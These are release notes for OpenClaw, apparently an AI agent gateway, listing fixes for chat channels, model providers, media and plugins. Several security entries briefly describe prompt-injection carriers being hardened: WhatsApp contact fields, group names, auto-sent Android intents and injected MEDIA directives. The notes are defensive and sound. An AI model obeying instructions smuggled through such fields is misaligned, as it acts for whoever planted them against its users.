<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
